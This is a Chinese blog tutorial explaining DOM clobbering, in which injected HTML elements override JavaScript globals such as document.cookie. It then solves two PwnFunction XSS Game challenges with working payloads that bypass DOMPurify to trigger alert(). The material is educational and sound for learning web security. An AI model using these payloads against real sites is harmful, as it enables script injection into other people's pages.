DOM破坏原理与漏洞复现

已于 2024-08-17 22:25:18 修改
阅读量382 收藏 6
点赞数 13
分类专栏: 网络安全 文章标签: 前端 安全
于 2024-08-17 22:23:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aihua002/article/details/141287778
版权

目录

Dom 破坏

1.获取标签

2.cookie值的覆盖

3.多层覆盖

4.字符串覆盖写入

漏洞复现

案例一

案例二

Dom 破坏


Dom Clobbering(Dom破坏) 就是⼀种将 HTML 代码注入页面中以操纵 DOM 并最终更改页面上 JavaScript 行为的技术。 在无法直接XSS的情况下,我们就可以往DOM Clobbering 这⽅向考虑了。

其实 Dom Clobbering 比较简单,我们看几个简单的例⼦就能知道它是⼲什么了的。

1.获取标签


通过打印<img>标签中的id或者name属性值,我们获取到了整个<img>标签

从中我们也发现了规律,直接打印x,y不管是id还是name都可以打印出来

而通过document来获取x,y只能打印出name属性的标签

window和直接打印的结果是一样的,都可以打印

打印的结果如图:

2.cookie值的覆盖


这个例子可以看出原本是没有cookie这个属性的,然后我创建了一个div,再创建一个img,里面包含一个name属性,值为cookie。

接着把img放入div,把div放入document.body下,再调用document.cookie发现获取了这个img标签,这就说明document.cookie已经被我们用img标签给覆盖了

3.多层覆盖


document.body.appendChild(div)我们上面也有,是追加div进body里面,我们看一下此时的输出

这个方法不存在了,取而代之的是img标签,这里其实就是实现了覆盖的作用,破坏了原有的方法。

4.字符串覆盖写入


既然我们可以通过这种方式去创建或覆盖document或者widow对象的某些值,但是看起来我们举的例子只是利用标签创建或覆盖最终得到的也是标签,是一个HTMLElment对象。但对于大多数情况来说,我们可能更需要将其转换成一个可控的字符串类型,以便于我们进行操作。

所以我们可以通过以下代码进行筛选得到可以通过toString方法将其转换成字符串类型的标签:
 

Object.getOwnPropertyNames(window)        //通过getOwnPropertyNames函数获取object自身的属性名称
        .filter(p => p.match(/Element$/))  //filter是一个过滤函数,过滤出含Element结尾的函数
        .map(p => window[p])               //使用map将过滤的函数所有的window元素拿出来
        .filter(p => p && p.prototype && p.prototype.toString
        !== Object.prototype.toString)     //通常Object上的tostring方法返回的值是一个对象,
                                             此句表示继续筛选使原型链上tostring方法与Object上的toString方法不相同,
                                             即需要保证筛选出的p.prototype.toString返回的值为非对象


执行结果:

这里执行代码后得到了两个object的值分别为HTMLAreaElement()和HTMLAnchorElement(),这两个标签其实分别为<area>及<a>这两个方法返回的值为非对象(字符串), 我们可以通过href属性利用这两个标签进行字符串的转换。 

漏洞复现


XSS Game - Learning XSS Made Simple! | Created by PwnFunction

案例一

<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>
GET参数boomer被设置为boomer.innerHTML,通过get参数将内容写入h2标签内,而且有过滤框架DOMPurify

setTimeout可以接受函数或字符串作为参数并执行它。在这里,ok变量被执行,但它不存在。

这里的JS代码是没有任何关于ok参数的定义的,所以我们可以使用DOM破坏,通过DOM破坏,将HTML元素注入到DOM中。

创建JavaScript变量

构造ok参数,因为setTimeout函数执行字符串,所以需要用到<a>或者<textarea>标签

payload:

<a id=ok href="tel:alert(1)">a


案例二

<script>
    /* Helpers */
    const bootstrapAlert = (msg, type) => {
        return (`<div class="alert alert-${type}" role="alert">${DOMPurify.sanitize(msg)}</div>`)
    }
 
    document.getAlert = () => document.getElementById('alerts');
</script>
 
<script>
    /* Welcome */
    let name = (new URL(location).searchParams.get('name')) || "Pamela Landy";
    document.write(
        bootstrapAlert(`<b>Operation Treadstone</b>: Welcome <u>${name}</u>.`, 'info')
    )
</script>
 
<!-- alerts -->
<div id="alerts"></div>
 
<script>
    /* Handle to `#alert` */
    let alerts = document.getAlert();
 
    /* Treadstone Credentials */
    let identification = Math.random().toString(36).slice(2);
    let code = Math.floor(Math.random() * 89999 + 10000);
 
    /* Default Credentials */
    DEFAULTS = {};
    DEFAULTS[identification] = code;
</script>
 
<script>
    /* Optional Comment */
    if (location.hash) {
        let comment = document.createComment(decodeURI(location.hash).slice(1));
        document.querySelector('#alerts').appendChild(comment);
    }
</script>
 
<script>
    /* Use `DEFAULTS` to init `SECRETS` */
    SECRETS = DEFAULTS
 
    /* Increment the `code` before the check */
    let secretKey = new URL(location).searchParams.get('key') || "TREADSTONE_WEBB";
    SECRETS[secretKey] += 1;
 
    /* Authorization Check */
    if (SECRETS[secretKey] === SECRETS[identification]) {
        confirm(`Jesus Christ, it's Jason Bourne!`)
    } else {
        confirm(`You ain't David Webb!`)
    }
</script>

代码分析
第一个script块

首先定义了一个函数bootstrapAlert(msg,type),返回值是一个div标签里面包含着msg输入的东西,还使用了DOMPurify框架进行过滤

之后又定义了一个函数get.Alert,获取id为alerts的元素

第二个script块

首先通过GET传入name参数,如果没有传,默认Pamela Landy

然后调用bootstrapAlert函数,相当于这样
 

<div class="alert alert-info" role="alert">
     <b>Operation Treadstone</b>
     : Welcome <u>${name}</u>
</div>


然后一个id属性为alerts的div标签

第三个script块

首先将函数getAlert()的返回值赋给alerts

之后生成一个0,1的随机数,再将其转换为36进制的字符串,然后切片,去掉前两个字符

再使用Math.random()*89999+10000生成一个10000到89999的随机数赋给code

然后定义了一个DEFAULTS空对象

最后将code赋值给DEFAULTS对象里的identification属性

第四个script块

如果存在location.hash值

那就去掉前面的#号,将hash值取出来,然后以改内容创建注释赋值给comment

最后找到id属性为alerts的标签,将comment添加为它的子元素

第五个script块

首先把对象DEFAULTS赋给SECRETS

之后找到GET参数key,将它赋给secretKey,如果不存在默认为"TREADSTONE_WEBB"

并将secretKey值加1作为属性赋给SECRETS对象

然后if判断SECRETS[secretKey]与SECRETS[identification]是否相等

payload:

?name=<img name=getAlert><form id=alerts name=DEFAULTS>&key=innerHTML#--><img src onerror=alert(1337)>

梦中北山
关注
  • 13
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++实现单链表反转(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-25 182
C++实现单链表反转(附完整源码)
C++向链表的反转
weixin_45023390的博客
09-02 685
C++,链表
c++反转链表
最新发布
weixin_39291964的博客
03-05 527
C++中,反转链表是一个常见的编程问题,主要涉及链表的遍历和指针操作。以下是使用迭代方法反转单链表的示例代码。请注意,上述代码仅适用于单链表。对于双向链表或其他复杂的链表结构,反转操作可能需要额外的步骤和考虑。,来分别追踪当前遍历到的节点、它的前一个节点和后一个节点。作为参数,通过迭代的方式反转链表,最后返回新的头节点。函数用于打印链表的内容,以便验证反转操作的结果。函数进行反转,然后打印反转后的链表。函数创建了一个示例链表,并调用。结构体,用于表示链表的节点。函数接收链表的头节点。
C++单链表创建及翻转(2021.3.12)
I have a dream, here my dreams come true!
03-13 1277
单链表的定义与翻转2021.3.11单链表代码运行结果 单链表 代码 #include <iostream> #include <malloc.h> using namespace std; typedef struct Node { struct Node* next; int data;//数据 }Node; Node *CreateLinklist()//尾插法创建 { int n; Node *head; head = (Node*)malloc(sizeof
向链表的反转c++实现)
qq_36472818的博客
07-17 2万+
目录前言向链表的反转实现代码总结 前言 本篇文章接着前文单链表的插入、删除(c++实现)实现链表的反转,主要也即是在前文的基础上完成了一个InvertList()函数。 向链表的反转 通过前面两篇文章的学习,已经对于链表的操作有一定掌握,而反转的实现就是一点小技巧,需要用到三个指针变量,类似于两个数交换的思想,层次递进。 现在假设定义pre、phead、temp三个指针变量,用phead指向链...
c++单链表的三种反转
weixin_42579072的博客
06-01 1842
在刷LeetCode题时,链表的反转可分三种情况: 1、反转整个链表 2、反转其中连续的一部分 3、分段反转 一、反转整个链表 Leetcode206. 反转链表 示例: 输入: 1->2->3->4->5->NULL 输出: 5->4->3->2->1->NULL /** * Definition for singly-linked list. * struct ListNode { * int val; * Li.
数据结构链表反转(C/C++
kaixian2003的博客
03-25 1720
向链表在数据结构中比较常见,要求实现向链表的反转,如下图所示: 反转前: 反转后: 代码如下: #include <stdio.h> #include <stdlib.h> struct list{ int var; struct list *next; }; //反转向链表 void reversal(struct list* &head) { struct list *p1,*pre,*after; p1=head; pre=head; head=h
单链表反转(C++)
zrh_CSDN的博客
04-18 731
链表的反转 基本思想: 用三个指针,其中一个指针p指向头结点,q为p的下一个结点。通过判断q是否为空,实现循环,在每一次循环中,引入新的指针r,将q指针的下一个结点设为p,并更新指针q和r。 C++完整代码如下: #include<iostream> using namespace std; struct ListNode { int val; ListN...
2.C语言数据结构 单链表反转
Scroll_C的博客
11-25 1311
单链表反转(4 种算法实现) 已经对单链表以及它的用法有了一个完整的了解。在此基础上,本节再带领大家研究一个和单链表有关的问题,即如何实 现单链表反转反转链表,又可以称为翻转或逆置链表,它们表达的是同一个意思。以图 1 所示的链表为例: 图 1 未反转的链表 图 1 未反转的链表 经过反转(翻转、逆置)后,得到的新链表如图 2 所示:...
C++ 单链表反转 C++ 单链表反转
12-30
单链表是一种常见的数据结构,它由一系列节点组成,每个节点包含数据和指向下一个节点的指针。在C++中,我们通常通过定义一个结构体或类来表示链表节点。在这个例子中,我们有一个名为`linkb`的结构体,它有两个成员...
C++数据结构单链表实现
09-18
单链表是一种线性数据结构,其中每个元素(称为节点)包含两部分:数据域和指针域。数据域存储实际的数据,而指针域指向下一个节点。链表的最后一个节点的指针域通常为NULL,表示链表的结束。 接下来,我们将通过...
18级合工大数据结构实验单链表
04-14
在本实验中,我们将专注于一种基本的数据结构——单链表,这是18级合工大数据结构实验的一部分。这个实验旨在帮助学生深入理解单链表的概念、操作以及其实现方式。 单链表是一种线性数据结构,其中每个元素(称为...
数据结构 双向链表(C++
06-07
双向链表是一种特殊的数据结构,它在计算机程序设计中扮演着重要角色,特别是在C++这样的编程语言中。本节将深入探讨双向链表的概念、其结构、操作以及C++中的实现。 双向链表与单链表不同,它允许每个节点不仅有一...
数据结构与算法C++1
08-03
数据结构与算法是计算机科学的基础,C++是实现这些概念的强大工具。本课程主要涵盖了数据结构和算法的基本概念,以及如何使用C++进行实现。以下是根据标题、描述和部分内容提炼的相关知识点: 1. **数据结构**: -...
单链表反转-C++实现
m0_62170162的博客
04-19 355
可用三个指针指示链表位置,进行链表指向反转:三个指针顺序依次为:p,q,o 当q指向空,说明链表已反转完毕1. 特判:链表为空链表或只有一个元素的链表,则直接返回2.反转:初始指针:循环结束条件(q为空):{o记录下q的下一个位置q指针反转p,q指针依次往前一位原本head头变为链表尾,所以让head指向NULL3 返回:q成为新链表的表头,返回q。
反转链表---C++实现
Orange_Ocean_的博客
12-20 497
链表 C++
单链表反序(反转C++实现
dawn_after_dark的博客
06-23 7626
问题描述就是给一个链表,求出反转后的链表,比如1 2 3 4 5反转后为5 4 3 2 1. 链表的基础定义及实现参考博文:http://blog.csdn.net/dawn_after_dark/article/details/73610674 下面的解决方法都是基于此类进行解决的。解决方法方法一:利用三个指针思路,利用三个指针(pre,mid,after),原始状态为head->pre->m
C++ 实现对单链表反转算法
weixin_53064820的博客
03-31 267
/线性时间复杂度的反转单链表的函数,传入链表的头结点就可以对整个单链表进行反转。有个时候,我们需要对单链表进行反转操作,如下代码实现了对单链表反转操作。这些代码对有个单链表反转操作是线性时间复杂度。
数据结构 - 完全二叉树
热门推荐
了解➔熟悉➔掌握➔精通
02-18 6万+
分享一个大牛的人工智能教程。零基础!通俗易懂!风趣幽默!希望你也加入到人工智能的队伍中来!请点击http://www.captainbed.net 完全二叉树是一种效率很高的数据结构,堆就是一种完全二叉树,效率极高。像十分常用的排序算法、Dijkstra算法、Prim算法等等都要用堆才能优化;经常提到的二叉排序树的效率也要借助平衡性来提高,而平衡性基于完全二叉树。 完全二叉树(Comp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值